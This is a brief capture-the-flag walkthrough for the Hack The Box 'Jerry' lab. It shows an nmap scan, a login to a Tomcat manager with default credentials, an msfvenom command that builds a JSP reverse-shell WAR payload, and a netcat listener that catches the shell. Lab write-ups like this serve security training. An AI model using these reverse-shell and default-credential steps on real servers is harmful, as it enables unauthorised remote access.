Hack The Box - Jerry Walkthrough




Let’s do a port scan to find if there are any services running.

nmap -sC -sV -oA nmap/initial -vvv 

We found Apache Tomcat with http is running on port 8080, so let’s check what is being served at

Manager App looks interesting. Upon clicking on it, we are greeted with a login prompt.

Upon clicking cancel, we are greeted with an example of default credentials for Tomcat.

If we put those credentials into the login prompt from earlier, we reach the console page.

We see a place upload a file, so let’s use msfvenom to generate a payload to get reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=44 -f war > shelle0.war

Next we upload the payload and go to

Then we use netcat to listen on port 44 get shell.

nc -l -v -p 44

With some poking around, we find some logins for Tomcat

Now if we navigate to the desktop of the Administrator account, we find the flags.



Here is a list of resources I used at some point while working on Jerry: